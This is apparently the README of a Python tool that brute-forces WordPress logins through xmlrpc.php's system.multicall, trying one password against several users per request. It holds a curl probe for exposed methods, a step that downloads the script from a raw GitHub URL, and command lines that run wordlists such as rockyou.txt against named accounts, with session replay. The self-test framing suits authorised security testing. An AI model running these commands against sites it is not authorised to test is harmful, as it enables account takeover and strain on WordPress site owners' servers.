Python 3 script for bruteforcing multiple Wordpress users using only one request per password.
The Hacktrick's Wordpress Pentesting Guide mentions that, if xmlrpc.php is enabled, Bruteforcing and DoS attacks can be used by abusing the system functionalities, including trying multiple users with only one request, using the system.multicall function (see here).
Run this command, replacing your-blog.com with your website:
YOURBLOG=http://your-blog.com/xmlrpc.php
curl -d "<methodCall><methodName>system.listMethods</methodName><params></params></methodCall>" -X POST $YOURBLOG
See if the response is an XML with all functionalities available, like:
<?xml version="1.0" encoding="UTF-8"?>
<methodResponse>
<params>
<param>
<value>
<array><data>
<value><string>system.multicall</string></value>
<value><string>system.listMethods</string></value>
<value><string>system.getCapabilities</string></value>
<value><string>demo.addTwoNumbers</string></value>
[...]
If yes, it's probably vulnerable.
pip install requests
curl https://raw.githubusercontent.com/entr0pie/xmlrpc-multi-request/main/xmlrpc.py | tee xmlrpc.py
python3 xmlrpc.py --target=https://your-blog.com --users admin,editor,reader
python3 xmlrpc.py --target=https://your-blog.com --users admin,editor,reader --wordlist=my_wordlist.txt
python3 xmlrpc.py --target=https://your-blog.com --users admin,editor,reader --wordlist=my_wordlist.txt --word=super_secure_password
By default, xmlrpc.py saves in the config.json the last session:
{
"host":"http://your-blog.com/xmlrpc.php",
"users":"['admin', 'editor', 'reader']",
"wordlist":"/usr/share/wordlists/rockyou.txt",
"word":"mcfly",
"debug":"False"
}
You can replay that session running:
python3 xmlrpc.py --config config.json
This project is under GNU GPLv3.